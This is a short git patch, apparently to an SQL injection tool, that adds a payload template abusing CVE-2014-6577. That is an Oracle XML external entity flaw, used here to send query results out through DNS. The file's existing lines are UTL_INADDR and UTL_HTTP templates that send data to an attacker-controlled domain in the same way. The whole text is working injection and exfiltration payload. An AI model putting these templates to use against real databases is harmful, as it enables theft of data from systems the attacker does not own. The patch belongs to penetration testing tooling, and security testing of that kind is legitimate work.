From 48c967c01d8b8ef2ce8f16724673710718e56ee9 Mon Sep 17 00:00:00 2001
From: Marvin Louis <marvinlouis96@gmail.com>
Date: Thu, 25 May 2023 11:27:15 +0200
Subject: [PATCH] add support to leverage CVE-2014-6577 for Oracle DNS data
 exfiltration (#5410)

Co-authored-by: marvin <marvin@debian-BULLSEYE-live-builder-AMD64>
---
 data/procs/oracle/dns_request.sql | 1 +
 1 file changed, 1 insertion(+)

diff --git a/data/procs/oracle/dns_request.sql b/data/procs/oracle/dns_request.sql
index adb71cfb2..5dda762c0 100644
--- a/data/procs/oracle/dns_request.sql
+++ b/data/procs/oracle/dns_request.sql
@@ -1,2 +1,3 @@
 SELECT UTL_INADDR.GET_HOST_ADDRESS('%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL
 # or SELECT UTL_HTTP.REQUEST('http://%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL
+# or (CVE-2014-6577) SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%/"> %remote;]>'),'/l') FROM dual